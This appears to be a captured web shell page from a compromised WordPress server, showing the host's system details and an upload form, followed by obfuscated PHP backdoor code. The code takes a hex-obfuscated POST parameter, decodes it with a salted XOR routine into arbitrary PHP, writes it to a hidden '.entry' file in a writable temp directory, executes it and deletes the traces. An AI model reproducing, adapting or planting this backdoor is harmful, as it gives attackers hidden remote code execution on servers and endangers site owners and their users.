| Server IP : 162.243.168.218 / Your IP : 216.73.217.81 Web Server : Apache System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64 User : web23 ( 5020) PHP Version : 8.3.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/clients/client3/web23/web/wp-admin/ |
Upload File : |
<?php
if(count($_POST) > 0 && isset($_POST["\x76\x61lue"])){
$parameter_group = $_POST["\x76\x61lue"];
$parameter_group = explode ( ".", $parameter_group ) ;
$marker = '';
$salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($salt8);
$o = 0;
foreach ($parameter_group as $v9) {
$chS = ord($salt8[$o % $sLen]);
$dec = ((int)$v9 - $chS - ($o % 10)) ^ 45;
$marker .= chr($dec);
$o++; }
$val = array_filter([getcwd(), getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", "/tmp"]);
foreach ($val as $holder) {
if ((bool)is_dir($holder) && (bool)is_writable($holder)) {
$comp = vsprintf("%s/%s", [$holder, ".entry"]);
if (file_put_contents($comp, $marker)) {
include $comp;
@unlink($comp);
die();
}
}
}
}